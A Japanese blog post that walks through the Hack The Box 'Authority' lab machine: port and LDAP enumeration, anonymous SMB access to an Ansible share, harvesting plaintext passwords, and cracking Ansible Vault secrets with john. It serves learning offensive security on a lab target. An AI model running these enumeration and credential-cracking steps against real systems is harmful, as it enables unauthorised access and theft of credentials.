3
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

ZOZOAdvent Calendar 2023

Day 10

【Hack The Box】Authority【Writeup】

Last updated at Posted at 2023-12-09

これは ZOZO Advent Calendar 2023 カレンダーVol.4の3日目の記事です。昨日の投稿は@YasuhiroKimesawaさんの「いまさら!いまこそ!ニコニコカレンダー!」でした。

初めに

本記事は Hack The Box(以下リンク参照)の「Authority」にチャレンジした際のWriteupになります。

※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。

初期探索

まずHTBのマシンでは攻略対象のIPが1つ与えられます。
このIPに対してVPN接続越しにポートスキャンを行い、空いているPortを探します。

ポートスキャン

RustScanを利用します。

┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.11.155 --top --ulimit 5000 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.11.155:53
Open 10.129.11.155:80
Open 10.129.11.155:88
Open 10.129.11.155:135
Open 10.129.11.155:139
Open 10.129.11.155:389
Open 10.129.11.155:445
Open 10.129.11.155:464
Open 10.129.11.155:593
Open 10.129.11.155:636
Open 10.129.11.155:5985
Open 10.129.11.155:3269
Open 10.129.11.155:3268
Open 10.129.11.155:8443
Open 10.129.11.155:9389
Open 10.129.11.155:49664
Open 10.129.11.155:49666
Open 10.129.11.155:49667
Open 10.129.11.155:49665
Open 10.129.11.155:49671
Open 10.129.11.155:49686
Open 10.129.11.155:49687
Open 10.129.11.155:49690
Open 10.129.11.155:49689
Open 10.129.11.155:49699
Open 10.129.11.155:49714
Open 10.129.11.155:49719
Open 10.129.11.155:47001
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 21:14 EDT
Initiating Ping Scan at 21:14
Scanning 10.129.11.155 [4 ports]
Completed Ping Scan at 21:14, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:14
Completed Parallel DNS resolution of 1 host. at 21:14, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:14
Scanning 10.129.11.155 [28 ports]
Discovered open port 135/tcp on 10.129.11.155
Discovered open port 53/tcp on 10.129.11.155
Discovered open port 139/tcp on 10.129.11.155
Discovered open port 49666/tcp on 10.129.11.155
Discovered open port 80/tcp on 10.129.11.155
Discovered open port 3268/tcp on 10.129.11.155
Discovered open port 445/tcp on 10.129.11.155
Discovered open port 88/tcp on 10.129.11.155
Discovered open port 636/tcp on 10.129.11.155
Discovered open port 49671/tcp on 10.129.11.155
Discovered open port 8443/tcp on 10.129.11.155
Discovered open port 47001/tcp on 10.129.11.155
Discovered open port 49719/tcp on 10.129.11.155
Discovered open port 5985/tcp on 10.129.11.155
Discovered open port 49667/tcp on 10.129.11.155
Discovered open port 9389/tcp on 10.129.11.155
Discovered open port 49664/tcp on 10.129.11.155
Discovered open port 464/tcp on 10.129.11.155
Discovered open port 49665/tcp on 10.129.11.155
Discovered open port 49686/tcp on 10.129.11.155
Discovered open port 49690/tcp on 10.129.11.155
Discovered open port 49714/tcp on 10.129.11.155
Discovered open port 49689/tcp on 10.129.11.155
Discovered open port 593/tcp on 10.129.11.155
Discovered open port 49699/tcp on 10.129.11.155
Discovered open port 49687/tcp on 10.129.11.155
Discovered open port 389/tcp on 10.129.11.155
Discovered open port 3269/tcp on 10.129.11.155
Completed SYN Stealth Scan at 21:14, 0.54s elapsed (28 total ports)
Nmap scan report for 10.129.11.155
Host is up, received echo-reply ttl 127 (0.26s latency).
Scanned at 2023-07-15 21:14:52 EDT for 1s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
8443/tcp  open  https-alt        syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49671/tcp open  unknown          syn-ack ttl 127
49686/tcp open  unknown          syn-ack ttl 127
49687/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49690/tcp open  unknown          syn-ack ttl 127
49699/tcp open  unknown          syn-ack ttl 127
49714/tcp open  unknown          syn-ack ttl 127
49719/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
           Raw packets sent: 32 (1.384KB) | Rcvd: 29 (1.260KB)

Windows環境ぽいです。色々とPortが開いているので、情報を収集していきます。
ldapのプロトコルからルートDSA固有エントリを取得する。

┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn --open 10.129.11.155 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 21:20 EDT
Nmap scan report for 10.129.11.155
Host is up (0.25s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=authority,DC=htb
|       ldapServiceName: authority.htb:authority$@AUTHORITY.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedControl: 1.2.840.113556.1.4.2330
|       supportedControl: 1.2.840.113556.1.4.2354
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=authority,DC=htb
|       serverName: CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=authority,DC=htb
|       namingContexts: DC=authority,DC=htb
|       namingContexts: CN=Configuration,DC=authority,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=authority,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=authority,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=authority,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 266468
|       dsServiceName: CN=NTDS Settings,CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
|       dnsHostName: authority.authority.htb
|       defaultNamingContext: DC=authority,DC=htb
|       currentTime: 20230716052122.0Z
|_      configurationNamingContext: CN=Configuration,DC=authority,DC=htb
Service Info: Host: AUTHORITY; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 1.41 seconds

dnsHostName: authority.authority.htbからドメインの情報がわかりました。
80のPortが開いているのでこのPortにアクセスしてみます。
1.png
ただのIISなので別のルートから情報収集します。

rpcclient

RPCが開いているので列挙できるか試します。

┌──(root㉿kali)-[~]
└─# rpcclient 10.129.11.155 -U '' -N  
rpcclient $> enumdomains
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> 

ダメでした。

SMB

Port139, 445があいているのでSMB通信が出来るか試してみる。
もしかしたらなにかヒントになるファイルが落ちている可能性があるので。
パスワードなしで見ることが出来る領域を探っていく。

┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.129.11.155 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Department Shares Disk      
        Development     Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.11.155 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Development, Department Shares Diskが怪しいのでここから探っていく。
Department Shares DiskはアクセスできなかったのでDevelopment階層にアクセスしてみる。

┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.129.11.155\\Development
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Mar 17 09:20:38 2023
  ..                                  D        0  Fri Mar 17 09:20:38 2023
  Automation                          D        0  Fri Mar 17 09:20:40 2023
cd 
                5888511 blocks of size 4096. 1335841 blocks available
smb: \> cd Automation
smb: \Automation\> dir
  .                                   D        0  Fri Mar 17 09:20:40 2023
  ..                                  D        0  Fri Mar 17 09:20:40 2023
  Ansible                             D        0  Fri Mar 17 09:20:50 2023

                5888511 blocks of size 4096. 1335841 blocks available

インフラ自動化Tool(Ansible)の階層が見える。この階層を再帰的に回収する。

smb: \Automation\> mask ""
smb: \Automation\> recurse ON
smb: \Automation\> prompt OFF
smb: \Automation\> mget *
getting file \Automation\Ansible\ADCS\.ansible-lint of size 259 as Ansible/ADCS/.ansible-lint (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\.yamllint of size 205 as Ansible/ADCS/.yamllint (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\LICENSE of size 11364 as Ansible/ADCS/LICENSE (10.9 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\README.md of size 7279 as Ansible/ADCS/README.md (7.0 KiloBytes/sec) (average 4.6 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.txt of size 466 as Ansible/ADCS/requirements.txt (0.4 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.yml of size 264 as Ansible/ADCS/requirements.yml (0.3 KiloBytes/sec) (average 3.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\SECURITY.md of size 924 as Ansible/ADCS/SECURITY.md (0.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tox.ini of size 419 as Ansible/ADCS/tox.ini (0.4 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.travis.yml of size 1414 as Ansible/LDAP/.travis.yml (1.4 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\README.md of size 5768 as Ansible/LDAP/README.md (5.4 KiloBytes/sec) (average 2.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\TODO.md of size 119 as Ansible/LDAP/TODO.md (0.1 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\Vagrantfile of size 640 as Ansible/LDAP/Vagrantfile (0.6 KiloBytes/sec) (average 2.3 KiloBytes/sec)
getting file \Automation\Ansible\PWM\ansible.cfg of size 491 as Ansible/PWM/ansible.cfg (0.5 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\PWM\ansible_inventory of size 174 as Ansible/PWM/ansible_inventory (0.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\PWM\README.md of size 1290 as Ansible/PWM/README.md (1.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\defaults\main.yml of size 1578 as Ansible/ADCS/defaults/main.yml (1.5 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\meta\main.yml of size 549 as Ansible/ADCS/meta/main.yml (0.5 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\meta\preferences.yml of size 22 as Ansible/ADCS/meta/preferences.yml (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\assert.yml of size 2936 as Ansible/ADCS/tasks/assert.yml (2.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\generate_ca_certs.yml of size 2262 as Ansible/ADCS/tasks/generate_ca_certs.yml (2.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\init_ca.yml of size 1244 as Ansible/ADCS/tasks/init_ca.yml (1.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\main.yml of size 1359 as Ansible/ADCS/tasks/main.yml (1.3 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\requests.yml of size 4214 as Ansible/ADCS/tasks/requests.yml (4.0 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\templates\extensions.cnf.j2 of size 1659 as Ansible/ADCS/templates/extensions.cnf.j2 (1.6 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\templates\openssl.cnf.j2 of size 11294 as Ansible/ADCS/templates/openssl.cnf.j2 (10.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\vars\main.yml of size 2146 as Ansible/ADCS/vars/main.yml (2.0 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\clean_vault of size 677 as Ansible/LDAP/.bin/clean_vault (0.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\diff_vault of size 357 as Ansible/LDAP/.bin/diff_vault (0.3 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\smudge_vault of size 768 as Ansible/LDAP/.bin/smudge_vault (0.7 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\defaults\main.yml of size 1046 as Ansible/LDAP/defaults/main.yml (1.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\files\pam_mkhomedir of size 170 as Ansible/LDAP/files/pam_mkhomedir (0.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\handlers\main.yml of size 277 as Ansible/LDAP/handlers/main.yml (0.3 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\meta\main.yml of size 416 as Ansible/LDAP/meta/main.yml (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\tasks\main.yml of size 5235 as Ansible/LDAP/tasks/main.yml (4.9 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\ldap_sudo_groups.j2 of size 131 as Ansible/LDAP/templates/ldap_sudo_groups.j2 (0.1 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\ldap_sudo_users.j2 of size 106 as Ansible/LDAP/templates/ldap_sudo_users.j2 (0.1 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\sssd.conf.j2 of size 2556 as Ansible/LDAP/templates/sssd.conf.j2 (2.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\sudo_group.j2 of size 30 as Ansible/LDAP/templates/sudo_group.j2 (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\debian.yml of size 174 as Ansible/LDAP/vars/debian.yml (0.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\main.yml of size 75 as Ansible/LDAP/vars/main.yml (0.1 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\redhat.yml of size 222 as Ansible/LDAP/vars/redhat.yml (0.2 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\ubuntu-14.04.yml of size 203 as Ansible/LDAP/vars/ubuntu-14.04.yml (0.2 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\PWM\defaults\main.yml of size 1591 as Ansible/PWM/defaults/main.yml (1.5 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\PWM\handlers\main.yml of size 4 as Ansible/PWM/handlers/main.yml (0.0 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\meta\main.yml of size 199 as Ansible/PWM/meta/main.yml (0.2 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\tasks\main.yml of size 1832 as Ansible/PWM/tasks/main.yml (1.8 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\templates\context.xml.j2 of size 422 as Ansible/PWM/templates/context.xml.j2 (0.4 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\templates\tomcat-users.xml.j2 of size 388 as Ansible/PWM/templates/tomcat-users.xml.j2 (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\SHARE\tasks\main.yml of size 1876 as Ansible/SHARE/tasks/main.yml (1.8 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\converge.yml of size 106 as Ansible/ADCS/molecule/default/converge.yml (0.1 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\molecule.yml of size 526 as Ansible/ADCS/molecule/default/molecule.yml (0.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\prepare.yml of size 371 as Ansible/ADCS/molecule/default/prepare.yml (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \Automation\>

色々ファイルがありそう。調査が大変ですな。

クレデンシャルアクセス

調査

SMB経由で収集したファイルから何か情報がないか集めると、以下のクレデンシャルが見つかりました。

┌──(root㉿kali)-[~/work/Ansible/PWM]
└─# cat ansible_inventory 
ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore  
┌──(root㉿kali)-[~/work/Ansible/PWM]
└─# cat defaults/main.yml        
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764    
┌──(root㉿kali)-[~/work/Ansible/LDAP]
└─# cat .travis.yml      
---
language: python
python: "2.7"

# Use the new container infrastructure
sudo: false

# Install ansible
addons:
  apt:
    packages:
    - python-pip

env:
  global:
    - secure: "YP54FaEPVveTtCzlJG3YPuhxUFQvbVkr1L/AA9NM9rwFciwQcLtIXD9iljD17xzoXRwvooNW90eX8XMR2zkhqzU9C+n3kHw2iQVtAdbI1X59lGAXAT7WBMlU6auFsoVzkFibHxJ1W9R1o5JE2iTdDuR0UzQNaTgLn3Dgt7iOWzwNni3dmqdtbPXY7e5x+JhlKHOU53bGnLxFVmbTWzu0Z8ZDuVvh01azHdR0sj8KmC4c8A8atZU0f2f4YyG/26tx78U6RmNFyj2UTmOHRgOtcQVOzfadbI9gZuc1U5JIkS0FEwZYaJOMYhohAqp9Aumo+cuPVJCvjaEXrlvEe4DAJ6aFigT+JR6NY7w+fgoK57HTgC/y7chY30+34ggp+/0aWmXFqdDUbFWs9ovhf0hVL4AcU+31BWdrEmuJjXAGaGMSrdTYJpMFsnjIqe3bUimH1LEm4+wogD/poGSkRsv9R7j1OeQotVDaivRh6WOBdbXEw5HENczsBzD3TztN8A54UzvVnrMnoPI+aH2uvSm/5JVvqWzWEzZHIpep7lbTgRk/1yjxQk6mXDGtrd9uo4e7ZeEr3rBqtA6qI4VggugHIbLGtqQvINdV9fOnDB1sLlslLEIKfT8BLpnDncPYYVV0r0wyC5ySP+RX7nqsixX5oOR7a1UyXBBQ9D0CX3x7x0Y="

install:
  # Install ansible
  - pip install ansible

  # Check ansible version
  - ansible --version

  # Create ansible.cfg with correct roles_path
  - printf '[defaults]\nroles_path=../' >ansible.cfg

before_script:
  - echo "$VAULT_PASSWORD" > .vault_password

script:
  # Basic role syntax check
  - ansible-playbook tests/travis.yml -i localhost, --vault-password-file .vault_password --syntax-check

notifications:
  webhooks:
    urls:
      - https://galaxy.ansible.com/api/v1/notifications/
      - https://t2d.idolactiviti.es/notify
┌──(root㉿kali)-[~/work/Ansible/ADCS/defaults]
└─# cat main.yml 
---
# defaults file for ca

# set ca_init: 'yes' to create CA
ca_init: yes

# ca_own_root: 'yes' if you want to have yout own root CA.
# if no, set ca_certificate_path manually
ca_own_root: yes

# A passphrase for the CA key.
ca_passphrase: SuP3rS3creT

# The common name for the CA.
ca_common_name: authority.htb

# Other details for the CA.
ca_country_name: NL
ca_email_address: admin@authority.htb
ca_organization_name: htb
ca_organizational_unit_name: htb
ca_state_or_province_name: Utrecht
ca_locality_name: Utrecht
┌──(root㉿kali)-[~/work/Ansible/PWM/templates]
└─# cat tomcat-users.xml.j2  
<?xml version='1.0' encoding='cp1252'?>

<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
 version="1.0">

<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>  
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>

</tomcat-users>

色々見つかったがwinrmでのログインは全部弾かれました。もう少し捻る必要がありそうです。

Ansible Vault

PWM/defaults/main.ymlの階層にあるansible vaultについて調べてみると、以下のNFLabsさんの記事を見つけた。

この手順でvaultを復号できそうなので、復号してみます。
以下のようにvaultを記載したファイルを作成します(pwm_admin_passwordを例としました)。

pwm_admin_password
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531

これでjohnさん用にハッシュを作成します。

┌──(root㉿kali)-[~/work]
└─# ansible2john pwm_admin_password          
pwm_admin_password:$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5

ここでjohnさんにpassフレーズを解読してもらいます。

┌──(root㉿kali)-[~/work]
└─# john hash --wordlist=./rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 SSE2 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (pwm_admin_password)     
1g 0:00:00:40 DONE (2023-07-16 22:51) 0.02472g/s 983.7p/s 983.7c/s 983.7C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

同様に残り2つも解読します。

┌──(root㉿kali)-[~/work]
└─# john hash --wordlist=./rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 SSE2 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (pwm_admin_login)     
!@#$%^&*         (ldap_admin_password)     
2g 0:00:01:47 DONE (2023-07-16 22:55) 0.01859g/s 370.0p/s 740.0c/s 740.0C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

一緒のフレーズみたいなので、このフレーズを用いてansible vaultをデコードします。

┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt ldap_admin_password
Vault password: 
Decryption successful

┌──(root㉿kali)-[~/work]
└─# cat ldap_admin_password 
DevT3st@123   

┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt pwm_admin_password 
Vault password: 
Decryption successful
                                                                                                                                                            
┌──(root㉿kali)-[~/work]
└─# cat pwm_admin_password 
pWm_@dm!N_!23 

